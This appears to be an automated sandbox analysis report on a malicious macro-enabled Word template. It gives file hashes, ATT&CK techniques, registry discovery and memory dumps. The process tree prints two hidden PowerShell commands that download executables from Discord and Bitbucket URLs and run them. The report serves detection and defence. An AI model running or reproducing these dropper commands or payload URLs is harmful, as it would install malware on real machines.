7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce

Analysis

max time kernel
101s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
16/06/2023, 18:36

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

example.dotm
Size

16KB
MD5

1aae26fe5d7b7dc4d6794a7828aecedc
SHA1

fbb8c6f45f53dc80e276a72cf9f567054b65c206
SHA256

1d473e82efa66368ffb4ce8f5eb947296c8e8d3febbe3a6283857da6fb1cc7d5
SHA512

2036693971d4710c9d59c569a8a8fef98ee33422b324c343c07aac9fb67500f82e54c6904054f65a7294dbbc745773fdbf6a6051aa7a71ac8b04b9c3dcf5c6e0
SSDEEP

384:tBt67TB+TZ2T/aNxt/ZtNNei/eX+30Oncsqf:R6PaGIxllNeAeX+3BcBf

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe

Extracted

Language

ps1

Source

URLs

exe.dropper

https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2088	3720	powershell.exe	83
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2612	3720	powershell.exe	83

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3720	WINWORD.EXE
3720	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2612	powershell.exe
2088	powershell.exe
2612	powershell.exe
2088	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3720	WINWORD.EXE
3720	WINWORD.EXE
3720	WINWORD.EXE
3720	WINWORD.EXE
3720	WINWORD.EXE
3720	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3720 wrote to memory of 2088	3720	WINWORD.EXE	84
PID 3720 wrote to memory of 2088	3720	WINWORD.EXE	84
PID 3720 wrote to memory of 2612	3720	WINWORD.EXE	86
PID 3720 wrote to memory of 2612	3720	WINWORD.EXE	86

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe -Dest C:\Users\Public\putty.exe;C:\Users\Public\putty.exe
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx -Dest C:\Users\Public\simplecryptservice.docx;C:\Users\Public\simplecryptservice.docx
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
61e2e57471d559f5f6813c0a7995c075

SHA1
33c621541bc0892ddab1b65345a348c14af566e5

SHA256
c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

SHA512
9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0db9717ae725ed4e82e2dfe301212fb1

SHA1
7e234eb7c008699c6e74ff7d36fa49b5fb60d565

SHA256
a1edc5d0625f06eb99ce4e145131874795648378b40fd65d73fc0d15232cd6cc

SHA512
e9e93b13a0a4c49946ce96accadcf5f3dd1ccd375c8110f43ed839c53143d29300d82ed20ccae721fb781ece59da4cab2350865081d7aedcfa9b813dd04761e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_niecwhsu.cay.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
c342b7d8437866c4dd796763b6a0eccb

SHA1
988ecdef0596b3500631b86ead68a8a3852d1e34

SHA256
16ea5e9cfd94c5c2876bfd04d71ba4165d36b57a1b50612d5285e28654cdcc43

SHA512
c7053fe18fe3ebeb1a900ec946ce4274db04082ecc2dd0428f6414be0e6ba8e942fdf3b96a49bc42fc368f161338bfe2692cab3cbda9ffa72e524f49c4ee654b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
03f1db2aa910584d435a87c5449e54b4

SHA1
f8e342759853f2ebdde068fb4980f0dd6c8ecc08

SHA256
466b41f743b13b66aec1e37bed0b33aef945c4cae9a9d4a506d704f186a417a9

SHA512
ae70a0328cbecc1dd72a3af5fe2d11533eaa221bb7e81dec1e0e59fd9d59f0de8e5992ee6117023c445940e89a3254a4977a4c8850a96d947b5e969972c07f78

Download Submit
memory/2088-209-0x000001486CF80000-0x000001486CF90000-memory.dmp

Filesize
64KB

Download
memory/2088-208-0x000001486CF80000-0x000001486CF90000-memory.dmp

Filesize
64KB

Download
memory/2088-205-0x000001486CF80000-0x000001486CF90000-memory.dmp

Filesize
64KB

Download
memory/2088-199-0x000001486CF80000-0x000001486CF90000-memory.dmp

Filesize
64KB

Download
memory/2088-175-0x000001486CF80000-0x000001486CF90000-memory.dmp

Filesize
64KB

Download
memory/2088-196-0x000001486CF80000-0x000001486CF90000-memory.dmp

Filesize
64KB

Download
memory/2612-185-0x0000020A61AC0000-0x0000020A61AE2000-memory.dmp

Filesize
136KB

Download
memory/2612-197-0x0000020A61AF0000-0x0000020A61B00000-memory.dmp

Filesize
64KB

Download
memory/2612-195-0x0000020A7A590000-0x0000020A7A5A4000-memory.dmp

Filesize
80KB

Download
memory/2612-174-0x0000020A61AF0000-0x0000020A61B00000-memory.dmp

Filesize
64KB

Download
memory/2612-198-0x0000020A61AF0000-0x0000020A61B00000-memory.dmp

Filesize
64KB

Download
memory/3720-138-0x00007FFAA50B0000-0x00007FFAA50C0000-memory.dmp

Filesize
64KB

Download
memory/3720-139-0x00007FFAA50B0000-0x00007FFAA50C0000-memory.dmp

Filesize
64KB

Download
memory/3720-133-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-137-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-136-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-135-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-134-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-230-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-231-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-232-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download
memory/3720-233-0x00007FFAA71D0000-0x00007FFAA71E0000-memory.dmp

Filesize
64KB

Download